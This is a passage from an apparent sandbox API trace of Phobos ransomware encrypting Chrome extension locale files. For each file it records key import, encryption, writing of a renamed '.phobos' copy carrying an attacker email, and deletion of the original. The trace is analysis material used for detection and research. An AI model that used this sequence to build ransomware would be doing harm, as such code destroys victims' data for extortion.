Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json")) returned 1 [0151.152] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.152] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=249) returned 1 [0151.152] CloseHandle (hObject=0x134) returned 1 [0151.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json")) returned 0x2020 [0151.152] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.152] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.152] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.152] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.153] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.153] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.153] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf9, lpOverlapped=0x0) returned 1 [0151.157] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.157] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.157] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.157] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.157] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.157] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.157] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.158] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.158] CloseHandle (hObject=0x134) returned 1 [0151.158] CloseHandle (hObject=0x138) returned 1 [0151.158] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_gb\\messages.json")) returned 1 [0151.159] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.159] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=249) returned 1 [0151.159] CloseHandle (hObject=0x138) returned 1 [0151.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json")) returned 0x2020 [0151.159] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.159] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.159] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.160] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.160] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.160] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.160] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.160] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf9, lpOverlapped=0x0) returned 1 [0151.161] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.161] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.162] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.162] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.162] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.162] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.162] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.162] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.162] CloseHandle (hObject=0x138) returned 1 [0151.162] CloseHandle (hObject=0x134) returned 1 [0151.162] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\en_us\\messages.json")) returned 1 [0151.163] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.163] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=259) returned 1 [0151.163] CloseHandle (hObject=0x134) returned 1 [0151.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json")) returned 0x2020 [0151.163] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.164] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.164] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.164] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.164] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.164] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x103, lpOverlapped=0x0) returned 1 [0151.165] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.165] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.166] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.166] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.166] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.166] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.166] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.166] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.166] CloseHandle (hObject=0x134) returned 1 [0151.166] CloseHandle (hObject=0x138) returned 1 [0151.166] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es\\messages.json")) returned 1 [0151.167] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.167] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=259) returned 1 [0151.167] CloseHandle (hObject=0x138) returned 1 [0151.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json")) returned 0x2020 [0151.167] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.168] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.168] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.168] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.168] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.168] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x103, lpOverlapped=0x0) returned 1 [0151.169] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.169] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.170] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0151.170] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.170] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.170] CryptDestroyKey (hKey=0xa32d68) returned 1 [0151.170] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.170] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.170] CloseHandle (hObject=0x138) returned 1 [0151.170] CloseHandle (hObject=0x134) returned 1 [0151.170] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\es_419\\messages.json")) returned 1 [0151.171] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.172] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=251) returned 1 [0151.172] CloseHandle (hObject=0x134) returned 1 [0151.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json")) returned 0x2020 [0151.172] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\et\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 